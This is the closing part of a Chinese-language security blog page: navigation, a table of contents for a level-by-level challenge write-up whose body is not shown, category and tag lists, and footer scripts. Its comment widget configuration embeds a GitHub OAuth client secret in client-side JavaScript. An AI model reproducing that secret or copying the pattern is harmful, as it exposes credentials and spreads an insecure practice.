href="/2018/08/31/%E5%AE%89%E5%85%A8/CTF/hackburger/"><span class="level-item">hackburger writeup</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.6.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.6.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: "409a7c24ac56b5e34ea1774a307e44c6",
            repo: "Catcheryp.github.io",
            owner: "Catcheryp",
            clientID: "9e096ad408bfdef7182a",
            clientSecret: "7b5d427415e86f5f1d4dc29c3d7b73d0944e760d",
            admin: ["Catcheryp"],
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 20,
            pagerDirection: "last",
            proxy: "https://netnr-proxy.cloudno.de/https://github.com/login/oauth/access_token",
            
            enableHotKey: true,
            language: "zh-CN",
        })
        gitalk.render('comment-container')</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#规则"><span class="level-left"><span class="level-item">规则</span></span></a></li><li><a class="level is-mobile" href="#Level-0"><span class="level-left"><span class="level-item">Level 0</span></span></a></li><li><a class="level is-mobile" href="#Level-1"><span class="level-left"><span class="level-item">Level 1</span></span></a></li><li><a class="level is-mobile" href="#Level-2"><span class="level-left"><span class="level-item">Level 2</span></span></a></li><li><a class="level is-mobile" href="#Level-3"><span class="level-left"><span class="level-item">Level 3</span></span></a></li><li><a class="level is-mobile" href="#Level-4"><span class="level-left"><span class="level-item">Level 4</span></span></a></li><li><a class="level is-mobile" href="#Level-5"><span class="level-left"><span class="level-item">Level 5</span></span></a></li><li><a class="level is-mobile" href="#Level-6"><span class="level-left"><span class="level-item">Level 6</span></span></a></li><li><a class="level is-mobile" href="#Level-7"><span class="level-left"><span class="level-item">Level 7</span></span></a></li><li><a class="level is-mobile" href="#Level-8"><span class="level-left"><span class="level-item">Level 8</span></span></a></li><li><a class="level is-mobile" href="#Level-9"><span class="level-left"><span class="level-item">Level 9</span></span></a></li><li><a class="level is-mobile" href="#Level-A"><span class="level-left"><span class="level-item">Level A</span></span></a></li><li><a class="level is-mobile" href="#Level-B-⭐️"><span class="level-left"><span class="level-item">Level B ⭐️</span></span></a></li><li><a class="level is-mobile" href="#Level-C-⭐️"><span class="level-left"><span class="level-item">Level C ⭐️</span></span></a></li><li><a class="level is-mobile" href="#Level-D-⭐️"><span class="level-left"><span class="level-item">Level D ⭐️</span></span></a></li><li><a class="level is-mobile" href="#Level-E-⭐️"><span class="level-left"><span class="level-item">Level E  ⭐️</span></span></a></li><li><a class="level is-mobile" href="#Level-F"><span class="level-left"><span class="level-item">Level F</span></span></a></li><li><a class="level is-mobile" href="#参考"><span class="level-left"><span class="level-item">参考</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/Linux/"><span class="level-start"><span class="level-item">Linux</span></span><span class="level-end"><span class="level-item tag">11</span></span></a><ul><li><a class="level is-mobile" href="/categories/Linux/Linux%E7%BC%96%E7%A8%8B/"><span class="level-start"><span class="level-item">Linux编程</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/Linux/Linux%E8%BF%90%E7%BB%B4/"><span class="level-start"><span class="level-item">Linux运维</span></span><span class="level-end"><span class="level-item tag">10</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/Python/"><span class="level-start"><span class="level-item">Python</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/"><span class="level-start"><span class="level-item">安全</span></span><span class="level-end"><span class="level-item tag">44</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">17</span></span></a></li><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/Web%E5%AE%89%E5%85%A8/"><span class="level-start"><span class="level-item">Web安全</span></span><span class="level-end"><span class="level-item tag">14</span></span></a></li><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8/"><span class="level-start"><span class="level-item">容器安全</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span class="level-start"><span class="level-item">渗透测试</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/%E7%A3%A8%E5%88%A9%E5%99%A8/"><span class="level-start"><span class="level-item">磨利器</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E6%80%BB%E7%BB%93/"><span class="level-start"><span class="level-item">总结</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/categories/%E8%AF%BB%E4%B9%A6/"><span class="level-start"><span class="level-item">读书</span></span><span class="level-end"><span class="level-item tag">11</span></span></a></li><li><a class="level is-mobile" href="/categories/%E9%80%A0%E4%BD%9C/"><span class="level-start"><span class="level-item">造作</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/2018/"><span class="tag">2018</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/2019/"><span class="tag">2019</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/2020/"><span class="tag">2020</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/apue/"><span class="tag">apue</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/awk/"><span class="tag">awk</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/coding/"><span class="tag">coding</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/ctf/"><span class="tag">ctf</span><span class="tag">17</span></a></div><div class="control"><a class="tags has-addons" href="/tags/curl/"><span class="tag">curl</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/cut/"><span class="tag">cut</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/df/"><span class="tag">df</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/docker/"><span class="tag">docker</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/du/"><span class="tag">du</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/find/"><span class="tag">find</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fq/"><span class="tag">fq</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/git/"><span class="tag">git</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/grep/"><span class="tag">grep</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/https/"><span class="tag">https</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/lsof/"><span class="tag">lsof</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/netcat/"><span class="tag">netcat</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/netstat/"><span class="tag">netstat</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/pip/"><span class="tag">pip</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/pipenv/"><span class="tag">pipenv</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/regex/"><span class="tag">regex</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/sed/"><span class="tag">sed</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/shell/"><span class="tag">shell</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/sort/"><span class="tag">sort</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/sqlmap/"><span class="tag">sqlmap</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/sql%E6%B3%A8%E5%85%A5/"><span class="tag">sql注入</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/ssh/"><span class="tag">ssh</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/thinking/"><span class="tag">thinking</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tips/"><span class="tag">tips</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tmux/"><span class="tag">tmux</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/todo/"><span class="tag">todo</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/top/"><span class="tag">top</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tricks/"><span class="tag">tricks</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/vim/"><span class="tag">vim</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/wireshark/"><span class="tag">wireshark</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/xss/"><span class="tag">xss</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><span class="tag">信息收集</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8D%9A%E5%AE%A2/"><span class="tag">博客</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%A5%BD%E6%96%87/"><span class="tag">好文</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%88%90%E9%95%BF/"><span class="tag">成长</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span class="tag">渗透测试</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/"><span class="tag">漏洞研究</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%AC%94%E8%AE%B0/"><span class="tag">笔记</span><span class="tag">8</span></a></div></div></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="catcheryp" height="28"></a><p class="is-size-7"><span>&copy; 2021 catcheryp</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/Catcheryp"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>